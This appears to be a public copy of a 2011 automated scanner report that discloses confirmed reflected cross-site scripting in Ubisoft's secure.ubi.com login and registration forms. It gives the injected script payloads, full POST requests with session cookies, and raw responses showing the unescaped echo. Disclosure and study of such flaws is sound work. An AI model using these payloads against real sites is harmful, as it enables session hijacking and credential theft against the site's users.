Reflected XSS, secure.ubi.com, REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Private Reporting of Security Research is preferred for Online Service Providers


Loading

Netsparker - Scan Report Summary
TARGET URL
https://secure.ubi.com/
SCAN DATE
4/22/2011 11:25:13 AM
REPORT DATE
4/22/2011 11:56:53 AM
SCAN DURATION
00:09:52

Total Requests

Average Speed

req/sec.
36
identified
33
confirmed
0
critical
1
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Blind SQL Injection, Boolean SQL Injection, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
83 %
LOW
14 %
INFORMATION
3 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ IIS Version Disclosure No
/login/ Cookie Not Marked As Secure Yes
Cookie Not Marked As HttpOnly Yes
ASP.NET Version Disclosure No
/login/ForgotPassword.aspx email POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
/login/Login.aspx login POST Cross-site Scripting Yes
login POST Cross-site Scripting Yes
password POST Cross-site Scripting Yes
password POST Cross-site Scripting Yes
login POST Cross-site Scripting Yes
password POST Cross-site Scripting Yes
login POST Cross-site Scripting Yes
password POST Cross-site Scripting Yes
login POST Cross-site Scripting Yes
password POST Cross-site Scripting Yes
Auto Complete Enabled Yes
ViewState is not Encrypted No
/login/Message.aspx Internal Server Error Yes
/login/UserInteraction.aspx login POST Cross-site Scripting Yes
password POST Cross-site Scripting Yes
confirmpassword POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
login POST Cross-site Scripting Yes
password POST Cross-site Scripting Yes
confirmpassword POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
login POST Cross-site Scripting Yes
password POST Cross-site Scripting Yes
confirmpassword POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
login POST Cross-site Scripting Yes
password POST Cross-site Scripting Yes
confirmpassword POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
Cross-site Scripting

Cross-site Scripting

29 TOTAL
IMPORTANT
CONFIRMED
29
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /login/Login.aspx

/login/Login.aspx CONFIRMED

https://secure.ubi.com/login/Login.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==
login POST '"--></style></script><script>alert(0x00030B)</script>
password POST 3
_buttonClicked POST submit

Request

POST /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/Login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 189
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg%3d%3d&login='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00030B)%3c%2fscript%3e&password=3&_buttonClicked=submit

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:27:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13495


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">The user name you entered is invalid. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x00030B)</script>" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2fLogin.aspx'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
}

//-->
</script>

<..
- /login/Login.aspx

/login/Login.aspx CONFIRMED

https://secure.ubi.com/login/Login.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==
login POST '"--></style></script><script>alert(0x000318)</script>
password POST 3
RememberPassword POST 1
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/Login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 256
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg%3d%3d&login='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000318)%3c%2fscript%3e&password=3&RememberPassword=1&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:27:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13495


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">The user name you entered is invalid. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x000318)</script>" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2fLogin.aspx'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
}

//-->
</script>

<..
- /login/Login.aspx

/login/Login.aspx CONFIRMED

https://secure.ubi.com/login/Login.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==
login POST 3
password POST '"--></style></script><script>alert(0x0003E2)</script>
_buttonClicked POST submit

Request

POST /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/Login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
